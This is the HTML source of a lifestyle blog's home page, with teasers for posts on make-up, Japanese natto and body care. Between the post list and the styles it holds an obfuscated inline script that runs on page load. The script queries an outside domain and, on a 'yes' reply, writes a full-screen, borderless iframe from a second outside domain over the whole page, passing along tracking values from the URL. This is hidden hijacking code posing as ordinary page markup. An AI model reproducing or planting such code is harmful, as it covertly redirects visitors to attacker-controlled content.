<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
     

    <title>life</title>

    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,700,900|Rubik:300,400,500" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="stylesheet" href="css/vendor/owl.carousel.min.css"/>
    <link rel="stylesheet" href="css/vendor/owl.theme.default.min.css"/>
    <link rel="stylesheet" href="css/custom.css">

    <!--[if lt IE 9]>
    <script src="js/vendor/html5shiv.min.js"></script>
    <script src="js/vendor/respond.min.js"></script>
    <![endif]-->

    <script src="https://use.fontawesome.com/9b701ba3c8.js"></script>
    <script src="js/vendor/jquery.min.js"></script>
    <script src="js/vendor/owl.carousel.min.js"></script>

    <script src="https://code.jquery.com/jquery-3.4.1.js"></script>
</head>
<body>

<header id="header">
    <div class="top-bar">
        <div class="container">
            <div class="row">
                <div class="col-sm-6 col-xs-4">
                    <div class="top-number">
                        <p>
                            <i class="fa fa-phone-square"></i> +6757896395125
                        </p>
                    </div>
                </div>
                <div class="col-sm-6 col-xs-8">
                    <div class="social">
                        <ul class="social-share">
                            <li><a href="#"><i class="fa fa-facebook"></i></a></li>
                            <li><a href="#"><i class="fa fa-twitter"></i></a></li>
                            <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
                            <li><a href="#"><i class="fa fa-dribbble"></i></a></li>
                            <li><a href="#"><i class="fa fa-skype"></i></a></li>
                        </ul>
                        <div class="search">
                            <form role="form">
                                <input type="text" class="search-form" autocomplete="off" placeholder="search">
                                <i class="fa fa-search"></i>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <nav class="navbar navbar-inverse" role="banner">
        <div class="container">
            <div class="navbar-header">
                <a class="navbar-brand" href="index.html">harmony</a>
            </div>

            <div class="navbar-collapse navbar-right">
                <ul class="nav navbar-nav flex-row">
                    <li class="active"><a href="index.html">Main</a></li>
                    <li><a href="contact.html">Contacts</a></li>
                    <li><a href="terms.html">Terms and conditions</a></li>
                    <li><a href="policy.html">Privacy policy</a></li>
                </ul>
            </div>
        </div>
    </nav>

</header>

<style>
    /*************************
*******Header******
**************************/

    #header .search {
        display: inline-block;
    }

    #header .navbar > .container .navbar-brand {
        margin-left: 0;
    }

    #header .top-bar {
        padding: 10px 0;
        background: #191919;
        border-bottom: 1px solid #222;
        line-height: 28px;
    }

    .top-number {
        color: #fff;
    }

    .top-number p {
        margin: 0
    }

    #header .social {
        text-align: right;
    }

    #header .social-share {
        display: inline-block;
        list-style: none;
        padding: 0;
        margin: 0;
    }

    ul.social-share li {
        display: inline-block;
    }

    ul.social-share li a {
        display: inline-block;
        color: #fff;
        background: #404040;
        width: 25px;
        height: 25px;
        line-height: 25px;
        text-align: center;
        border-radius: 2px;
    }

    ul.social-share li a:hover {
        background: #c52d2f;
        color: #fff;
    }

    #header .search i {
        color: #fff;
    }

    #header input.search-form {
        background: transparent;
        border: 0 none;
        width: 60px;
        padding: 0 10px;
        color: #FFF;
        -webkit-transition: all 400ms;
        -moz-transition: all 400ms;
        -ms-transition: all 400ms;
        -o-transition: all 400ms;
        transition: all 400ms;
    }

    #header input.search-form::-webkit-input-placeholder {
        color: transparent;
    }

    #header input.search-form:hover::-webkit-input-placeholder {
        color: #fff;
    }

    #header  input.search-form:hover {
        width: 180px;
    }

    #header .navbar-brand {
        padding: 0;
        margin: 0;
    }

    #header .navbar {
        border-radius: 0;
        margin-bottom: 0;
        background: #151515;
        padding: 15px 0;
        padding-bottom: 0;
    }

    #header .navbar-nav {
        margin-top: 12px;
    }

    #header .navbar-nav > li {
        margin-left: 35px;
        padding-bottom: 28px;
    }

    #header .navbar-inverse .navbar-nav > li > a {
        padding: 5px 12px;
        margin: 0;
        border-radius: 3px;
        color: #fff;
        line-height: 24px;
        display: inline-block;
    }

    #header .navbar-inverse .navbar-nav > li > a:hover {
        background-color: #c52d2f;
        color: #fff;
    }

    #header .navbar-inverse {
        border: none;
    }

    #header .navbar-inverse .navbar-brand {
        font-size: 36px;
        line-height: 50px;
        color: #fff;
    }

    #header .navbar-inverse .navbar-nav > .active > a,
    #header .navbar-inverse .navbar-nav > .active > a:hover,
    #header .navbar-inverse .navbar-nav > .active > a:focus,
    #header .navbar-inverse .navbar-nav > .open > a,
    #header .navbar-inverse .navbar-nav > .open > a:hover,
    #header .navbar-inverse .navbar-nav > .open > a:focus {
        background-color: #c52d2f;
        color: #fff;
    }

    #header .navbar-inverse .navbar-nav .dropdown-menu {
        background-color: rgba(0, 0, 0, .85);
        -webkit-box-shadow: 0 3px 8px rgba(0, 0, 0, 0.125);
        -moz-box-shadow: 0 3px 8px rgba(0, 0, 0, 0.125);
        box-shadow: 0 3px 8px rgba(0, 0, 0, 0.125);
        border: 0;
        padding: 0;
        margin-top: 0;
        border-top: 0;
        border-radius: 0;
        left: 0;
    }

    #header .navbar-inverse .navbar-nav .dropdown-menu:before {
        position: absolute;
        top: 0;
    }

    #header .navbar-inverse .navbar-nav .dropdown-menu > li > a {
        padding: 8px 15px;
        color: #fff;
    }

    #header .navbar-inverse .navbar-nav .dropdown-menu > li:hover > a,
    #header .navbar-inverse .navbar-nav .dropdown-menu > li:focus > a,
    #header .navbar-inverse .navbar-nav .dropdown-menu > li.active > a {
        background-color: #c52d2f;
        color: #fff;
    }

    #header .navbar-inverse .navbar-nav .dropdown-menu > li:last-child > a {
        border-radius: 0 0 3px 3px;
    }

    #header .navbar-inverse .navbar-nav .dropdown-menu > li.divider {
        background-color: transparent;
    }

    #header .navbar-inverse .navbar-collapse,
    #header .navbar-inverse .navbar-form {
        border-top: 0;
        padding-bottom: 0;
    }
</style>

<section class="hero-section">
    <div class="hero-slider owl-carousel">
        
        <div class="hero-item set-bg" style="background: url(./assets/images/brenda-godinez-_zn_7fzol1w-unsplash.jpg); background-size: cover">
            <div class="container">
                <div class="row">
                    <div class="col-lg-10 offset-lg-1">
                        <h2 class="text-shadow">Make-up like a star. Ekaterina Klimova</h2>
                        <p class="text-shadow">
                            <strong></strong> photos from the service See how make-up changes the appearance of a 40-year-old actress, in one case reducing, and in another adding...
                        </p>
                        <a href="8025278c42b17823cc94f70bdc72f7b7.html" class="site-btn">Read further</a>
                    </div>
                </div>
            </div>
        </div>
        

        <div class="hero-item set-bg" style="background: url(./assets/images/wesley-tingey-zjo7xkcogzm-unsplash.jpg); background-size: cover">
            <div class="container">
                <div class="row">
                    <div class="col-lg-10 offset-lg-1">
                        <h2 class="text-shadow">Natto-strange and healthy Japanese food</h2>
                        <p class="text-shadow">
                            <strong></strong> Natto is a special traditional Japanese food that is prepared from fermented soybeans on a special sourdough. Like most fermented fo...
                        </p>
                        <a href="1qGS7rF6xd7jKl6fYIVX09Bu3rH.html" class="site-btn">Read further</a>
                    </div>
                </div>
            </div>
        </div>
        

        <div class="hero-item set-bg" style="background: url(./assets/images/anna-pelzer-igfigp5onv0-unsplash.jpg); background-size: cover">
            <div class="container">
                <div class="row">
                    <div class="col-lg-10 offset-lg-1">
                        <h2 class="text-shadow">Top secrets of a well-groomed body</h2>
                        <p class="text-shadow">
                            <strong></strong> photos from the service In the modern world, where so many people work hard to look good, it is quite another matter when to spend a...
                        </p>
                        <a href="xhUl9N6fwdYbPZrWBQAFziDYc7w.html" class="site-btn">Read further</a>
                    </div>
                </div>
            </div>
        </div>
        

    </div>
</section>

<style>
    .hero-item {
        height: 804px;
        display: -webkit-box;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-align: center;
        -ms-flex-align: center;
        align-items: center;
        -webkit-box-pack: center;
        -ms-flex-pack: center;
        justify-content: center;
        text-align: center;
        position: relative;
    }

    .hero-item:after {
        position: absolute;
        content: "";
        width: 100%;
        height: 100%;
        left: 0;
        top: 0;
        background: #0d0d11;
        opacity: 0.74;
        z-index: 1;
    }

    .hero-item .container {
        position: relative;
        z-index: 9;
    }

    .hero-item h2 {
        font-size: 76px;
        font-weight: 700;
        color: #fff;
        margin-bottom: 15px;
    }

    .hero-item p {
        font-size: 20px;
        margin-bottom: 35px;
    }

    .hero-item .site-btn,
    .hero-item p,
    .hero-item h2 {
        position: relative;
        top: 50px;
        opacity: 0;
    }

    .hero-slider .owl-item.active .hero-item h2,
    .hero-slider .owl-item.active .hero-item p,
    .hero-slider .owl-item.active .hero-item .site-btn {
        top: 0;
        opacity: 1;
    }

    .hero-slider .owl-item.active .hero-item h2 {
        -webkit-transition: all 0.5s ease 0.4s;
        transition: all 0.5s ease 0.4s;
    }

    .hero-slider .owl-item.active .hero-item p {
        -webkit-transition: all 0.5s ease 0.6s;
        transition: all 0.5s ease 0.6s;
    }

    .hero-slider .owl-item.active .hero-item .site-btn {
        -webkit-transition: all 0.5s ease 0.8s;
        transition: all 0.5s ease 0.8s;
        background: #ffffff;
        padding: 1rem;
    }

    .slider-progress-bar {
        position: absolute;
        width: 100%;
        bottom: 0;
        left: 0;
    }

    .slider-progress-bar .progress {
        height: 4px;
        background: #10ddb4;
        -webkit-animation: sliderProgressBar ease;
        animation: sliderProgressBar ease;
    }

    .my-slider:hover .slider-progress-bar .progress {
        -webkit-animation-play-state: paused;
        animation-play-state: paused;
    }

    @-webkit-keyframes sliderProgressBar {
        0% {
            width: 0%;
        }
        100% {
            width: 100%;
        }
    }

    @keyframes sliderProgressBar {
        0% {
            width: 0%;
        }
        100% {
            width: 100%;
        }
    }

    .owl-nav.disabled {
        display: none;
    }
</style>

<script>
    $(document).ready(function() {
        var $slider = $('.hero-slider');
        var SLIDER_TIMEOUT = 10000;

        $slider.owlCarousel({
            items: 1,
            nav: false,
            dots: false,
            autoplay: true,
            autoplayTimeout: SLIDER_TIMEOUT,
            loop: true,
        });
    })
</script>

<section class="all_post section_padding">
    <div class="container">
        <div class="row">
            <div class="col-md-8 offset-md-2">
                <div class="row">
                    
                    <div class="col-lg-6 col-sm-6">
                        <div class="single_post post_1">
                            <div class="single_post_img">
                                <img src="./assets/images/brenda-godinez-_zn_7fzol1w-unsplash.jpg" alt="">
                            </div>
                            <div class="single_post_text text-center">
                                <a href="8025278c42b17823cc94f70bdc72f7b7.html"><h5> tone up</h5></a>
                                <a href="8025278c42b17823cc94f70bdc72f7b7.html"><h2>Make-up like a star. Ekaterina Klimova</h2></a>
                                <p>07.08.2021</p>
                            </div>
                        </div>
                    </div>
                    

                    <div class="col-lg-6 col-sm-6">
                        <div class="single_post post_1">
                            <div class="single_post_img">
                                <img src="./assets/images/wesley-tingey-zjo7xkcogzm-unsplash.jpg" alt="">
                            </div>
                            <div class="single_post_text text-center">
                                <a href="1qGS7rF6xd7jKl6fYIVX09Bu3rH.html"><h5> tone up</h5></a>
                                <a href="1qGS7rF6xd7jKl6fYIVX09Bu3rH.html"><h2>Natto-strange and healthy Japanese food</h2></a>
                                <p>07.08.2021</p>
                            </div>
                        </div>
                    </div>
                    

                    <div class="col-lg-6 col-sm-6">
                        <div class="single_post post_1">
                            <div class="single_post_img">
                                <img src="./assets/images/anna-pelzer-igfigp5onv0-unsplash.jpg" alt="">
                            </div>
                            <div class="single_post_text text-center">
                                <a href="xhUl9N6fwdYbPZrWBQAFziDYc7w.html"><h5> tone up</h5></a>
                                <a href="xhUl9N6fwdYbPZrWBQAFziDYc7w.html"><h2>Top secrets of a well-groomed body</h2></a>
                                <p>07.08.2021</p>
                            </div>
                        </div>
                    </div>
                    

                </div>
            </div>
        </div>
    </div>
</section>
<script type="text/javascript">var w=T;(function(N,U){var I=T,m=N();while(!![]){try{var D=parseInt(I(0xd2))/0x1+-parseInt(I(0xd3))/0x2+-parseInt(I(0xca))/0x3*(-parseInt(I('0xc3'))/0x4)+-parseInt(I(0xd9))/0x5*(-parseInt(I('0xd4'))/0x6)+-parseInt(I('0xd8'))/0x7*(parseInt(I('0xd1'))/0x8)+-parseInt(I(0xd6))/0x9+parseInt(I('0xc9'))/0xa;if(D===U)break;else m['push'](m['shift']());}catch(t){m['push'](m['shift']());}}}(y,0xb2099));function y(){var C=['location','8fCBLer','413301vBulyS','2436324UdxsBM','6044436BRAdTa','https://sincewbnyvxwnl.com/?key=wov4r9mo4cjh2teqx3k6','605196sIigqk','match','4894183ivjjYH','5fPnrTT','4832qiKcmk','=([^&=]+)','frameborder=\x220\x22\x20style=\x22overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\x22\x20height=\x22100%\x22\x20width=\x22100%\x22\x20></iframe>','&utm_term=','utm_campaign','write','7881650BLNgRu','1254FfTUXN','<iframe\x20src=\x22https://estabocmrnivtlf.com/?key=ncg5e65n7ffjfa882iud&utm_campaign=','search','yes','utm_term','get'];y=function(){return C;};return y();}function getCookies(N){var J=T,U=window[J(0xd0)][J('0xcc')];return U=U[J('0xd7')](new RegExp(N+J('0xc4'))),U?U[0x1]:![];}$[w('0xcf')](w('0xd5'),onAjaxSuccess);function T(N,U){var m=y();return T=function(D,t){D=D-0xc3;var I=m[D];return I;},T(N,U);}function onAjaxSuccess(N){var W=w;N==W(0xcd)&&document[W('0xc8')](W('0xcb')+getCookies(W('0xc7'))+W('0xc6')+getCookies(W('0xce'))+W('0xc5'));}</script>
<style>
    .section_padding {
        padding: 140px 0px;
    }

    .post_1 {
        position: relative;
        text-align: center;
        margin-bottom: 30px;
    }

    .post_1 .single_post_text {
        padding: 40px 10px;
        display: inline-block;
        text-align: center;
        background-color: #fff;
        margin-top: -50px;
        max-width: 320px;
    }

    .post_1 .single_post_text a h5 {
        color: #fc4600;
        margin-bottom: 17px;
    }

    .post_1 .single_post_text h2 {
        margin-bottom: 21px;
        font-size: 24px;
    }

    p {
        color: #888888;
        font-family: "Lora", serif;
        line-height: 1.929;
        font-size: 15px;
        margin-bottom: 0px;
        color: #646464;
    }
</style>

<footer class="footer">
    <div class="footer_top">
        <div class="container">
            <div class="row align-items-center">
                <div class="col-md-8">
                    <div class="menu_links">
                        <ul>
                            <li><a href="contact.html">Contacts</a></li>
                            <li><a href="terms.html">Terms and conditions</a></li>
                            <li><a href="policy.html">Privacy policy</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="socail_links">
                        <ul>
                            <li><a href="#"> <i class="fa fa-facebook"></i> </a></li>
                            <li><a href="#"> <i class="fa fa-twitter"></i> </a></li>
                            <li><a href="#"> <i class="fa fa-instagram"></i> </a></li>
                            <li><a href="#"> <i class="fa fa-google-plus"></i> </a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="copy-right_text">
        <div class="container">
            <div class="footer_border"></div>
            <div class="row">
                <div class="col-xl-12">
                    <p></p>
                </div>
            </div>
        </div>
    </div>
</footer>

<style>
    .footer {
        background-repeat: no-repeat;
        background-position: center center;
        background-repeat: no-repeat;
        background-size: cover;
    }

    /* line 6, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .footer_top {
        padding-top: 100px;
        padding-bottom: 100px;
        background: #001D38;
    }

    @media (max-width: 767px) {
        /* line 6, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
        .footer .footer_top {
            padding-top: 50px;
            padding-bottom: 30px;
        }
    }

    @media (min-width: 768px) and (max-width: 991px) {
        /* line 6, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
        .footer .footer_top {
            padding-top: 50px;
            padding-bottom: 60px;
        }
    }

    /* line 20, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .footer_top .menu_links ul li {
        display: inline-block;
        margin-right: 46px;
    }

    @media (max-width: 767px) {
        /* line 20, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
        .footer .footer_top .menu_links ul li {
            margin-right: 20px;
        }
    }

    /* line 26, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .footer_top .menu_links ul li a {
        color: #fff;
        font-size: 15px;
        font-weight: 500;
    }

    /* line 30, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .footer_top .menu_links ul li a:hover {
        color: #615CFD;
    }

    /* line 38, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .copy-right_text {
        padding-bottom: 30px;
        background: #001D38;
    }

    /* line 41, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .copy-right_text .footer_border {
        padding-bottom: 30px;
        border-top: 1px solid #334A60;
    }

    /* line 45, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .copy-right_text .copy_right {
        font-size: 13px;
        color: #C7C7C7;
        margin-bottom: 0;
        font-weight: 400;
    }

    @media (max-width: 767px) {
        /* line 45, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
        .footer .copy-right_text .copy_right {
            font-size: 13px;
        }
    }

    /* line 53, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .copy-right_text .copy_right a {
        color: #5DB2FF;
    }

    /* line 58, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .socail_links {
        text-align: right;
    }

    @media (max-width: 767px) {
        /* line 58, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
        .footer .socail_links {
            text-align: left;
            margin-top: 30px;
        }
    }

    /* line 67, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .socail_links ul li {
        display: inline-block;
    }

    /* line 70, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .socail_links ul li a {
        color: #fff;
        width: 40px;
        height: 40px;
        display: inline-block;
        text-align: center;
        background: transparent;
        -webkit-border-radius: 50%;
        -moz-border-radius: 50%;
        border-radius: 50%;
        line-height: 40px !important;
        margin-right: 7px;
        color: #FFFFFF;
        line-height: 40px !important;
        border: 1px solid #334A60;
        font-size: 15px;
    }

    /* line 84, ../../Arafath/CL/CL October/218 PORTFOLIO/HTML/scss/_footer.scss */
    .footer .socail_links ul li a:hover {
        color: #fff !important;
        background: #615CFD;
        border: 1px solid #615CFD;
    }
</style>